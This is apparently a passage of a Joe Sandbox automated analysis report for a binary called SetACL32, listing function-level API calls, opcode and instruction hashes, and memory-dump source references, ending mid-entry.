                • Instruction ID: e31ff0b53dadc8da22671537a24e28331d2fce558559b73b8585a3e1e6bc5797
                • Opcode Fuzzy Hash: 02caa8dd710bdf0b130c35f2b4a54b2d617bfc5a0db60e183004694bf5b5e76e
                • Instruction Fuzzy Hash: B711B7F26047514AEF304A3E8C88622BA949B5237CB340719D1BAC75F1C734D985F2C2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEncodePointer.NTDLL(00000000,?,00F89F70,00F89FB6,?,00F89DFD,00000000,00000000,00000000,00000004,00F5AF47,00000001,746D712B,00000000,?,?), ref: 00F8A8C4
                • IsProcessorFeaturePresent.KERNEL32(00000017,00F972DC,?,?,00F94163,00FC7070,0000000C), ref: 00F9578E
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: EncodeFeaturePointerPresentProcessor
                • String ID:
                • API String ID: 4030241255-0
                • Opcode ID: 9af64a6e13e40f9f43990f0f8211884d648d2f83f8800188869557fe7bae2d89
                • Instruction ID: 59f9076576ccdfca312b03eb0f1d4bb302577bdca49bf7efd4d1392da49bb297
                • Opcode Fuzzy Hash: 9af64a6e13e40f9f43990f0f8211884d648d2f83f8800188869557fe7bae2d89
                • Instruction Fuzzy Hash: 3501B570988B0DEBFF167BB0BD0FF593754AB01B24F044058B9085A1E1DFB54A45B752
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CompareStringEx.KERNELBASE(?,00FA30AF,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,7FFFFFFF,?,00F9C1BB,?,00001001), ref: 00F9A68A
                • CompareStringW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00FA30AF,-00000002,00000000,00000000,00000000,00000000), ref: 00F9A6A8
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CompareString
                • String ID:
                • API String ID: 1825529933-0
                • Opcode ID: 987e0b55f1d90b2599cba4ee5ea5c55e697115f0421cdcd4224190d51c37d8da
                • Instruction ID: 328799204ff1d740f3dedbe4f7925a686ea3978c88f0831879012f9483e6ae43
                • Opcode Fuzzy Hash: 987e0b55f1d90b2599cba4ee5ea5c55e697115f0421cdcd4224190d51c37d8da
                • Instruction Fuzzy Hash: C9F0683240021EBBDF125F90DC05DDE3F26AB487A0F098110BA1865020DB36C872BB96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: __cftof
                • String ID:
                • API String ID: 1622813385-0
                • Opcode ID: 70def35c964035302382885534a14ae05f577b4664d8f1f4205b7d5794052241
                • Instruction ID: eb5aa94457c688675315d2fba1eabf2559af52a4f93abe696ef720411f4457f8
                • Opcode Fuzzy Hash: 70def35c964035302382885534a14ae05f577b4664d8f1f4205b7d5794052241
                • Instruction Fuzzy Hash: 8231F9329081146ABF197B38BF979FE776C9E81B30724021AF5249B0D1EF29D843B691
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 5d08be2e05f4f25d03334fb65fe34752b917b9f2c2366c254b6755617d5efa31
                • Instruction ID: 483f2bb13eb04ba84ad32cc1ea7f77576fe6483471b1686daad53a13af118ccb
                • Opcode Fuzzy Hash: 5d08be2e05f4f25d03334fb65fe34752b917b9f2c2366c254b6755617d5efa31
                • Instruction Fuzzy Hash: 7E317876E006149F9F14DF69C48489EB7F2FF89320726C2A5E519EB360C334AD46EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 711f5d0d4f5d38ca6b581ff6606460c81c0f7008b434a8c049a208cd9f4bbc44
                • Instruction ID: ee66758e5d68541af3d356345938592d000b7e58e7eab5ca39489a8b8e947998
                • Opcode Fuzzy Hash: 711f5d0d4f5d38ca6b581ff6606460c81c0f7008b434a8c049a208cd9f4bbc44
                • Instruction Fuzzy Hash: EF01F133B402199BAF268E6DEC41A9A339ABBC033072A8160FD05CB194DA30DD05B7D2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97FB2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                • _free.LIBCMT ref: 00F9FF01
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocateHeap_free
                • String ID:
                • API String ID: 614378929-0
                • Opcode ID: cabf28225fd3a41a915252ae96e33d440cfae9ab80b93131df364b805196d117
                • Instruction ID: 96eea92b02cec4c6e0569cfe1b9240522f307bc345e788c7b0ecda6df69a0c73
                • Opcode Fuzzy Hash: cabf28225fd3a41a915252ae96e33d440cfae9ab80b93131df364b805196d117
                • Instruction Fuzzy Hash: F4012273A043166BEB309F68C88199AFB98EB053B0F140629E445E76C0EB706C15CBE4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97FB2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                • _free.LIBCMT ref: 00F8F590
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLast_free
                • String ID:
                • API String ID: 314386986-0
                • Opcode ID: 2ad285a6610fc3b095273d84f05ba3fbb0c2a7b99620578456285f85846583e9
                • Instruction ID: a0506e706c7722cdda68d9dd1ff9dbb6fcabd4d69ee983b95c4773311d0e5061
                • Opcode Fuzzy Hash: 2ad285a6610fc3b095273d84f05ba3fbb0c2a7b99620578456285f85846583e9
                • Instruction Fuzzy Hash: BA01C8B6E00219AFDB10EFA9C841ADEBBB8FB48710F144166E914E7240E774AA55CBD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 8a0d58358157342aa9e6c92fe9e67630a748c51181e7cf1a325879d43f840824
                • Instruction ID: dec8cbb80d4adab5fb6bb396b59d5471d1f5efa810359709ba2e2d4be48bbc4e
                • Opcode Fuzzy Hash: 8a0d58358157342aa9e6c92fe9e67630a748c51181e7cf1a325879d43f840824
                • Instruction Fuzzy Hash: 57F0B43291C725A6BF227A62DC06F6B3788AF81774B158061A815B6190DE30DC01B6E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F98049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                • _free.LIBCMT ref: 00FA344D
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLast_free
                • String ID:
                • API String ID: 314386986-0
                • Opcode ID: f92ee1901cd8096dbcb0af971099cca00dbb490c8258481c23d05de6a0fa212b
                • Instruction ID: ff3983cf809be9549902596baa5cfbfc17f1c3961db4d40ef0db409f635329b0
                • Opcode Fuzzy Hash: f92ee1901cd8096dbcb0af971099cca00dbb490c8258481c23d05de6a0fa212b
                • Instruction Fuzzy Hash: EBF0CD731043048FE3218F45D802B92F3F8EF81B21F10842FE29A8B5A0DBB8B4459B84
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 02247c3b0012637392768e30c2a20f12c8828e1bef9034e0d894a7cb6a045044
                • Instruction ID: 31f6ccd558f0e727e38171770a6c05dd943245c17b416bd9d3fa0e10174d3329
                • Opcode Fuzzy Hash: 02247c3b0012637392768e30c2a20f12c8828e1bef9034e0d894a7cb6a045044
                • Instruction Fuzzy Hash: 95E06D3290166597FE3176669C05B6B7A489F437F0F190221AD46971A0CF66CC4AB2E1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WSAStartup.WS2_32(00000002,00000002), ref: 00F51120
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: 7160471e88ea3094c610d090865c345188cb4fbbe2fa7ac56e3414ac6d8ab052
                • Instruction ID: c4392d558fb2028fced9d2ba38988bf09cbbaa236d1126b739212d6fd6b11cb0
                • Opcode Fuzzy Hash: 7160471e88ea3094c610d090865c345188cb4fbbe2fa7ac56e3414ac6d8ab052
                • Instruction Fuzzy Hash: F7F0E5B09542044FD320BB38DD17BB573D8EB05311F40056AE99DC7280EB21A911A7C3
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,?,?,00F99092,?,00000055,00000050), ref: 00F9A870
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DefaultUser
                • String ID:
                • API String ID: 3358694519-0
                • Opcode ID: 266a3c81db6cb7daa3b437dbdb43ed1f7139f2d405e454a835bf88e2d9395879
                • Instruction ID: 142d6d7d495ad8891c4de2f2b9e23b34f5bb43b8eb22fdf42db92c3cdf12b64f
                • Opcode Fuzzy Hash: 266a3c81db6cb7daa3b437dbdb43ed1f7139f2d405e454a835bf88e2d9395879
                • Instruction Fuzzy Hash: 77E08C3294022CB7EF123B61DC08A9E7F19EF447A0F008021F9085A121CB75C922FBC2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Free
                • String ID:
                • API String ID: 3978063606-0
                • Opcode ID: c07ec56f7fb4e07c02550d401a2322ba9069e748c51ce6a486b1f4069ccae43e
                • Instruction ID: 8dec152b42002e649de26b4927c9b73678f5a4cbc2fb5135004df906182ce95b
                • Opcode Fuzzy Hash: c07ec56f7fb4e07c02550d401a2322ba9069e748c51ce6a486b1f4069ccae43e
                • Instruction Fuzzy Hash: 5FA001B45000089B8E055B12AF8A9843A62EA81302B044564AA0E4287097650525AF22
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Free
                • String ID:
                • API String ID: 3978063606-0
                • Opcode ID: e13318283fa45cbac88194f0b09829becb72d163117cc12e945ab9586334b693
                • Instruction ID: 297c52f47cb70c1facc102001c78f2c487fc4a89f05cd7b4522687b3103fffac
                • Opcode Fuzzy Hash: e13318283fa45cbac88194f0b09829becb72d163117cc12e945ab9586334b693
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Free
                • String ID:
                • API String ID: 3978063606-0
                • Opcode ID: 8ff05901565bb911f589b38b78e95daea37cd9bb9eccca1f1a22f0344b8b891c
                • Instruction ID: f67c8dd9faacd55c9950f03435bb56a0d7fec2462b74ce29dc54e86edde8b29d
                • Opcode Fuzzy Hash: 8ff05901565bb911f589b38b78e95daea37cd9bb9eccca1f1a22f0344b8b891c
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F8AB65
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F8AB73
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F8AB84
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F8AB95
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F8ABA6
                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F8ABB7
                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00F8ABC8
                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F8ABD9
                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00F8ABEA
                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F8ABFB
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F8AC0C
                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F8AC1D
                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F8AC2E
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F8AC3F
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F8AC50
                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F8AC61
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F8AC72
                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00F8AC83
                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00F8AC94
                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00F8ACA5
                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00F8ACB6
                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00F8ACC7
                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00F8ACD8
                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00F8ACE9
                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00F8ACFA
                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00F8AD0B
                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F8AD1C
                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00F8AD2D
                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F8AD3E
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F8AD4F
                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00F8AD60
                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F8AD71
                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00F8AD82
                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F8AD93
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00F8ADA4
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00F8ADB5
                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00F8ADC6
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00F8ADD7
                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00F8ADE8
                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00F8ADF9
                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00F8AE0A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                • API String ID: 667068680-295688737
                • Opcode ID: 33a4be109e50bc62c0a6075ab900e01d10c3a2fcd63b4b2bee5e7d72186a0c0f
                • Instruction ID: dd8f68e059b6ddf9492e0e68aa2a89eeb733f8e5f3995a4572476744bcd30770
                • Opcode Fuzzy Hash: 33a4be109e50bc62c0a6075ab900e01d10c3a2fcd63b4b2bee5e7d72186a0c0f
                • Instruction Fuzzy Hash: 51610DF5D5331DABC700AFB4AD0FE463AE8AA9B7093018566F501D7561D7B8A004BFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00F80BCF
                • GetLastError.KERNEL32 ref: 00F80BD9
                • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00F80BF9
                • GetLastError.KERNEL32 ref: 00F80C03
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00FBFE30,00000000), ref: 00F80C22
                • GetLastError.KERNEL32 ref: 00F80C2C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DescriptorErrorLastSecurity$DaclGroupOwner
                • String ID: @M)w
                • API String ID: 3317944899-1211491014
                • Opcode ID: 2378a719b39a26617efadc22271c69964b8e94433a460951f8eaebd38eb27316
                • Instruction ID: 67ab3908793753dbe739600a68a74ba9725fb2fb55d1f9c25ae43fdae4185514
                • Opcode Fuzzy Hash: 2378a719b39a26617efadc22271c69964b8e94433a460951f8eaebd38eb27316
                • Instruction Fuzzy Hash: 985192B1E00209AFEB50EF64DC45BEA77A8FB05320F544629FC15D3290EB75A914EB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00F9A20A,00000002,00000000,?,?,?,00F9A20A,?,00000000), ref: 00F99F85
                • GetLocaleInfoW.KERNEL32(?,20001004,00F9A20A,00000002,00000000,?,?,?,00F9A20A,?,00000000), ref: 00F99FAE
                • GetACP.KERNEL32(?,?,00F9A20A,?,00000000), ref: 00F99FC3
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 6ea596e257a8fcb2e32d25dffe28d24ed9a72879e72b885d6c3c6edce8ee4b96
